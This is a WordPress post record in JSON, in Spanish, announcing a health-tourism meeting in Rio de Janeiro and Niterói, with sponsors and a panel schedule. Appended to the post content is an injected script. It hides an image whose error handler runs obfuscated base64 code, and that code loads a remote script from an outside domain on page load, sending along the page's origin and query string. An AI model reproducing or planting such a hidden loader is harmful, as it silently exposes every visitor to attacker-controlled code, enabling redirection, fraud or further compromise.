{"id":8505,"date":"2024-07-31T10:01:03","date_gmt":"2024-07-31T13:01:03","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8505"},"modified":"2025-08-13T15:40:44","modified_gmt":"2025-08-13T18:40:44","slug":"ii-encuentro-de-turismo-de-salud-rio-niteroi","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8505","title":{"rendered":"II Encuentro de Turismo de Salud R\u00edo-Niter\u00f3i"},"content":{"rendered":"\n<p>Turismo de Salud es el nombre de la actividad econ\u00f3mica que asocia la estancia de un individuo en una ciudad o regi\u00f3n tur\u00edstica, distinta de su domicilio, para la realizaci\u00f3n de tratamientos y procedimientos m\u00e9dicos, odontol\u00f3gicos, terap\u00e9uticos, de rehabilitaci\u00f3n y preventivos, entre otros.\u00a0<\/p>\n\n\n\n<p>La regi\u00f3n de R\u00edo-Niter\u00f3i tiene un enorme potencial para ingresar efectivamente a este mercado, especialmente porque tiene caracter\u00edsticas similares a los destinos de Turismo de Salud m\u00e1s relevantes del mundo, como modernos complejos hospitalarios y cl\u00ednicas de salud, equipos de diagn\u00f3stico por im\u00e1genes de \u00faltima generaci\u00f3n. y equipos de diagn\u00f3stico, laboratorios de an\u00e1lisis cl\u00ednicos de excelencia, un equipo de reconocidos profesionales en el \u00e1rea de la salud y la atenci\u00f3n (m\u00e9dicos, odont\u00f3logos, fisioterapeutas, enfermeras, entre otros) y una ubicaci\u00f3n privilegiada, cercana a carreteras federales y estatales. de los aeropuertos m\u00e1s importantes del pa\u00eds, uno de ellos de hecho, internacional y con un potencial de vuelo inexplorado dentro de sus l\u00edmites.<\/p>\n\n\n\n<p><strong>Continuando con varias acciones estrat\u00e9gicas que apuntan a hacer de la regi\u00f3n R\u00edo-Niter\u00f3i un actor importante en el Turismo de Salud, el II Encuentro de Turismo&nbsp;<\/strong>se realizar\u00e1 el 1 de agosto de 2024, a partir de las 8:30 horas, en la Prefectura de R\u00edo de Janeiro.&nbsp;, en el que profesionales de Comunicaci\u00f3n, Salud, Turismo y Derecho presentan las \u00faltimas novedades de este mercado que se ha construido en la regi\u00f3n.&nbsp;<strong><\/strong><\/p>\n\n\n\n<p>El evento, que es una iniciativa de la Rio Health Care Tourism Initiative, el VisitRio Convention Bureau y la Comisi\u00f3n de Turismo del Ayuntamiento de R\u00edo de Janeiro, cuenta con el apoyo de importantes instituciones y empresas, entre ellas la Organizaci\u00f3n Nacional de Acreditaci\u00f3n (ONA), la Hospital S\u00edrio-Liban\u00eas, el Consejo Regional de Medicina del Estado de R\u00edo de Janeiro (CREMERJ), el Colegio M\u00e9dico del Estado de R\u00edo de Janeiro (SOMERJ), la Asociaci\u00f3n M\u00e9dica Fluminense (AMF), la Asociaci\u00f3n Brasile\u00f1a de Enfermer\u00eda (ABEn\/ RJ), el Consejo Federal de Fisioterapia y Terapia Ocupacional (CREFITO), la Asociaci\u00f3n Brasile\u00f1a de Agencias de Viajes de R\u00edo de Janeiro (ABAV-RJ), la Asociaci\u00f3n de Hospitales del Estado de R\u00edo de Janeiro (AHERJ), la Federaci\u00f3n Brasile\u00f1a de Asociaci\u00f3n de Hospitales (FBH), la Uni\u00f3n de Hospitales, Cl\u00ednicas y Casas de Salud de Niter\u00f3i y S\u00e3o Gon\u00e7alo (SINDHLESTE), la Asociaci\u00f3n de Oficinas de Defensa M\u00e9dica (AEDM), la Asociaci\u00f3n Brasile\u00f1a para el Desarrollo de Edificios Hospitalarios (ABDEH\/RJ), la Polo Sa\u00fade Leste Fluminense, la Empresa de Eventos y Turismo de Niter\u00f3i (NELTUR), la Promoci\u00f3n del Conocimiento a trav\u00e9s de la Ense\u00f1anza, la Investigaci\u00f3n y la Innovaci\u00f3n (PROCEPI), la Asociaci\u00f3n Brasile\u00f1a de Bares y Restaurantes \/ Leste Fluminense (ABRASEL LESTE FLUMINENSE), la Federaci\u00f3n de Convenciones y Visitantes Bureaux, Sociedad de Turismo M\u00e9dico y de Salud (STEMS), Glowe Brasil, Feel Ativos Intang\u00edveis, Allan Kern Trainings, Philips Aparelhos Hearing Aids, Tegg Telecom, Territ\u00f3rio Sa\u00fade y Widebrasil Comunica\u00e7\u00e3o Integrada.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Si est\u00e1s interesado, reg\u00edstrate.<br><br><strong>CRONOGRAMA&nbsp;<\/strong><\/p>\n\n\n\n<p>08:45 \u2013&nbsp;<strong>Acreditaci\u00f3n y Caf\u00e9 de Bienvenida<\/strong><\/p>\n\n\n\n<p>09:00 \u2013&nbsp;<strong>Inauguraci\u00f3n oficial del II Encuentro de Turismo de Salud Rio-Niter\u00f3i<\/strong>&nbsp;.<br><\/p>\n\n\n\n<p>09:20 \u2013&nbsp;<strong>Presentaci\u00f3n del tema. Escenario global. Potencial de la regi\u00f3n Rio-Niter\u00f3i<\/strong><\/p>\n\n\n\n<p>Ricardo Da Fonseca, periodista.<\/p>\n\n\n\n<p>09:35 \u2013&nbsp;&nbsp;<strong>Panel I &#8211;&nbsp;&nbsp;<\/strong><strong>Aspectos iniciales<\/strong><\/p>\n\n\n\n<p><strong>Seguridad jur\u00eddica de la legislaci\u00f3n brasile\u00f1a e internacional que desmitifica creencias.<\/strong><\/p>\n\n\n\n<p><strong>Promoci\u00f3n Nacional e Internacional del Turismo de Salud<\/strong><\/p>\n\n\n\n<p>Moderador: Ricardo Da Fonseca<\/p>\n\n\n\n<p>Andr\u00e9 Bento, presidente de la Empresa de Eventos y Turismo de Niter\u00f3i (NELTUR);<\/p>\n\n\n\n<p>Dr. Lymark Kamaroff, abogado especialista en derecho m\u00e9dico;<\/p>\n\n\n\n<p>Roberta Werner, directora del VisitRio Convention Bureau (VISITRIO).<\/p>\n\n\n\n<p>10:15 \u2013&nbsp;&nbsp;<strong>Panel II &#8211;&nbsp;&nbsp;<\/strong><strong>Atenci\u00f3n internacional a pacientes en cl\u00ednicas y hospitales de la regi\u00f3n Rio-Niter\u00f3i.<\/strong><\/p>\n\n\n\n<p>Moderador:<\/p>\n\n\n\n<p>Panelistas:<\/p>\n\n\n\n<p>Dr. Eduardo Duarte, cirujano pl\u00e1stico de la Cl\u00ednica de Cirug\u00eda Pl\u00e1stica Eduardo Duarte;<\/p>\n\n\n\n<p>Dr. Ilza Fellows, director general de Promoci\u00f3n del Conocimiento con la Docencia, la Investigaci\u00f3n y la Innovaci\u00f3n (PROCEPI);<\/p>\n\n\n\n<p>Dr. Roberto Mi\u00fara, director m\u00e9dico de Glowe Brasil \u2013 Global Wellness Brasil.<\/p>\n\n\n\n<p>10:55 \u2013&nbsp;&nbsp;<strong>Panel III \u2013&nbsp;&nbsp;<\/strong><strong>Paciente internacional \u2013 desaf\u00edos y logros desde la perspectiva de los m\u00e9dicos y la red hospitalaria&nbsp;<\/strong>.<\/p>\n\n\n\n<p>Moderadores:<\/p>\n\n\n\n<p>Rog\u00e9rio Rocal, concejal y presidente de la Comisi\u00f3n de Turismo del Ayuntamiento de R\u00edo de Janeiro y&nbsp;&nbsp;el Dr. Paulo Pinheiro, concejal y presidente del Comit\u00e9 de Salud del Ayuntamiento de R\u00edo de Janeiro.<\/p>\n\n\n\n<p>Panelistas:<\/p>\n\n\n\n<p>Dr. R\u00f4mulo Capello, presidente del Colegio M\u00e9dico (SOMERJ);<\/p>\n\n\n\n<p>el Dr. Yuri Lutz, secretario ejecutivo del Consejo Regional de Medicina (CREMERJ);<\/p>\n\n\n\n<p>Dr. Marcus Quintella, presidente de la Asociaci\u00f3n de Hospitales (AHERJ).<\/p>\n\n\n\n<p>11:35 \u2013&nbsp;&nbsp;<strong>Presentaci\u00f3n principal (Keynote Speaker)&nbsp;<\/strong><strong>&nbsp;&#8211; Atenci\u00f3n al paciente internacional \u2013 Hospital S\u00edrio-Liban\u00eas (SP).<\/strong><\/p>\n\n\n\n<p>Felipe Kaneno, gerente de asuntos internacionales y corporativos del Hospital S\u00edrio-Liban\u00eas.<\/p>\n\n\n\n<p>12:05 \u2013&nbsp;&nbsp;<strong>Lanzamiento de la marca Health Care in Rio<\/strong>&nbsp;.<\/p>\n\n\n\n<p>Health Care in Rio estrategias e iniciativas para promover y atraer clientes.<\/p>\n\n\n\n<p>Ricardo Da Fonseca, periodista.<\/p>\n\n\n\n<p>&nbsp;<br>12:25 \u2013&nbsp;&nbsp;<strong>Clausura<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><img decoding=\"async\" src=\"https:\/\/images.sympla.com.br\/634304d009711.jpg\" alt=\"organizador\" style=\"width:77px;height:auto\" \/><\/figure>\n<\/div>\n\n\n<p>Productor: Ricardo Da Fonseca<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/visitrio.com.br\/evento\/ii-encontro-de-turismo-de-saude-rio-niteroi\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/visitrio.com.br\/wp-content\/uploads\/2023\/09\/Logo-Visit-Rio.svg\" alt=\"\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Turismo de Salud es el nombre de la actividad econ\u00f3mica que asocia la estancia de un individuo en una ciudad o regi\u00f3n tur\u00edstica, distinta de su domicilio, para la realizaci\u00f3n de tratamientos y procedimientos m\u00e9dicos, odontol\u00f3gicos, terap\u00e9uticos, de rehabilitaci\u00f3n y preventivos, entre otros.\u00a0 La regi\u00f3n de R\u00edo-Niter\u00f3i tiene un enorme potencial para ingresar efectivamente a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8506,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,30],"tags":[],"class_list":["post-8505","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8505"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8505\/revisions"}],"predecessor-version":[{"id":10117,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8505\/revisions\/10117"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8506"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}